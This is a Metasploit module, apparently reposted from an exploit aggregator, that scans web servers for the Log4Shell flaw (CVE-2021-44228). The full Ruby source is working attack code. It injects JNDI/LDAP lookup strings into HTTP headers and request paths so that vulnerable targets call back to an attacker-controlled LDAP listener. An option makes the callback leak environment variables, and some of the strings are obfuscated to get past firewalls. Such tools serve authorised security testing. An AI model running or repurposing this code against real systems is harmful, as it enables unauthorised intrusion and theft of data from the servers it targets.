Share
## https://sploitus.com/exploit?id=PACKETSTORM:181171
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::Log4Shell  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Log4Shell HTTP Scanner',  
'Description' => %q{  
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,  
log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.  
  
This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will  
trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying  
instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include  
HTTP headers and the HTTP request path.  
  
Known impacted software includes Apache Struts 2, VMWare VCenter, Apache James, Apache Solr, Apache Druid,  
Apache JSPWiki, Apache OFBiz.  
},  
'Author' => [  
'Spencer McIntyre', # The fun stuff  
'RageLtMan <rageltman[at]sempervictus>', # Some plumbing  
],  
'References' => [  
[ 'CVE', '2021-44228' ],  
[ 'CVE', '2021-45046' ],  
[ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis' ],  
[ 'URL', 'https://logging.apache.org/log4j/2.x/security.html' ]  
],  
'DisclosureDate' => '2021-12-09',  
'License' => MSF_LICENSE,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [IOC_IN_LOGS],  
'AKA' => ['Log4Shell', 'LogJam'],  
'Reliability' => []  
}  
)  
  
register_options([  
OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),  
OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),  
OptString.new('LEAK_PARAMS', [ false, 'Additional parameters to leak, separated by the ^ character (e.g., ${env:USER}^${env:PATH})']),  
OptPath.new(  
'HEADERS_FILE',  
[  
false,  
'File containing headers to check',  
File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_headers.txt')  
]  
),  
OptPath.new(  
'URIS_FILE',  
[  
false,  
'File containing additional URIs to check',  
File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_uris.txt')  
]  
),  
OptInt.new('LDAP_TIMEOUT', [ true, 'Time in seconds to wait to receive LDAP connections', 30 ])  
])  
end  
  
def log4j_jndi_string(resource = '')  
resource = resource.dup  
resource << '/${java:os}/${sys:java.vendor}_${sys:java.version}'  
# We should add obfuscation to the URL string to scan through lousy "next-gen" firewalls  
unless datastore['LEAK_PARAMS'].blank?  
resource << '/'  
resource << datastore['LEAK_PARAMS']  
end  
super(resource)  
end  
  
#  
# Handle incoming requests via service mixin  
#  
def build_ldap_search_response(msg_id, base_dn)  
token, java_os, java_version, uri_parts = base_dn.split('/', 4)  
target_info = @mutex.synchronize { @tokens.delete(token) }  
if target_info  
@mutex.synchronize { @successes << target_info }  
details = normalize_uri(target_info[:target_uri]).to_s  
details << " (header: #{target_info[:headers].keys.first})" unless target_info[:headers].nil?  
details << " (os: #{java_os})" unless java_os.blank?  
details << " (java: #{java_version})" unless java_version.blank?  
unless uri_parts.blank?  
uri_parts = uri_parts.split('^')  
leaked = ''  
datastore['LEAK_PARAMS'].split('^').each_with_index do |input, idx|  
next if input == uri_parts[idx]  
  
leaked << "#{input}=#{uri_parts[idx]} "  
end  
unless leaked.blank?  
details << " (leaked: #{leaked.rstrip})"  
vprint_good("Leaked data: #{leaked.rstrip}")  
end  
end  
peerinfo = "#{target_info[:rhost]}:#{target_info[:rport]}"  
print_good("#{peerinfo.ljust(21)} - Log4Shell found via #{details}")  
report_vuln(  
host: target_info[:rhost],  
port: target_info[:rport],  
info: "Module #{fullname} detected Log4Shell vulnerability via #{details}",  
name: name,  
refs: references  
)  
end  
  
attrs = [ ]  
appseq = [  
base_dn.to_ber,  
attrs.to_ber_sequence  
].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)  
[ msg_id.to_ber, appseq ].to_ber_sequence  
end  
  
def rand_text_alpha_lower_numeric(len, bad = '')  
foo = []  
foo += ('a'..'z').to_a  
foo += ('0'..'9').to_a  
Rex::Text.rand_base(len, bad, *foo)  
end  
  
def run  
validate_configuration!  
@mutex = Mutex.new  
@mutex.extend(::Rex::Ref)  
  
@tokens = {}  
@tokens.extend(::Rex::Ref)  
  
@successes = []  
@successes.extend(::Rex::Ref)  
  
begin  
start_service  
rescue Rex::BindFailed => e  
fail_with(Failure::BadConfig, e.to_s)  
end  
  
super  
  
print_status("Sleeping #{datastore['LDAP_TIMEOUT']} seconds for any last LDAP connections")  
sleep datastore['LDAP_TIMEOUT']  
  
if @successes.empty?  
return Exploit::CheckCode::Unknown  
end  
  
Exploit::CheckCode::Vulnerable(details: @successes)  
end  
  
def run_host(ip)  
# probe the target before continuing  
return if send_request_cgi('uri' => normalize_uri(target_uri)).nil?  
  
run_host_uri(ip, normalize_uri(target_uri)) unless target_uri.blank?  
  
return if datastore['URIS_FILE'].blank?  
  
File.open(datastore['URIS_FILE'], 'rb').each_line(chomp: true) do |uri|  
next if uri.blank? || uri.start_with?('#')  
  
if uri.include?('${jndi:uri}')  
token = rand_text_alpha_lower_numeric(8..32)  
jndi = log4j_jndi_string(token)  
uri.delete_prefix!('/')  
test(token, uri: normalize_uri(target_uri, '') + uri.gsub('${jndi:uri}', Rex::Text.uri_encode(jndi)))  
else  
run_host_uri(ip, normalize_uri(target_uri, uri))  
end  
end  
end  
  
def run_host_uri(_ip, uri)  
# HTTP_HEADER isn't exposed via the datastore but allows other modules to leverage this one to test a specific value  
unless datastore['HTTP_HEADER'].blank?  
token = rand_text_alpha_lower_numeric(8..32)  
test(token, uri: uri, headers: { datastore['HTTP_HEADER'] => log4j_jndi_string(token) })  
end  
  
unless datastore['HEADERS_FILE'].blank?  
headers_file = File.open(datastore['HEADERS_FILE'], 'rb')  
headers_file.each_line(chomp: true) do |header|  
next if header.blank? || header.start_with?('#')  
  
token = rand_text_alpha_lower_numeric(8..32)  
test(token, uri: uri, headers: { header => log4j_jndi_string(token) })  
end  
end  
  
token = rand_text_alpha_lower_numeric(8..32)  
jndi = log4j_jndi_string(token)  
test(token, uri: normalize_uri(uri, Rex::Text.uri_encode(jndi.gsub('ldap://', 'ldap:${::-/}/')), '/'))  
  
token = rand_text_alpha_lower_numeric(8..32)  
jndi = log4j_jndi_string(token)  
test(token, uri: normalize_uri(uri, Rex::Text.uri_encode(jndi.gsub('ldap://', 'ldap:${::-/}/'))))  
end  
  
def test(token, uri: nil, headers: nil)  
target_info = {  
rhost: rhost,  
rport: rport,  
target_uri: uri,  
headers: headers  
}  
@mutex.synchronize { @tokens[token] = target_info }  
  
send_request_raw(  
'uri' => uri,  
'method' => datastore['HTTP_METHOD'],  
'headers' => headers  
)  
end  
  
attr_accessor :mutex, :tokens, :successes  
end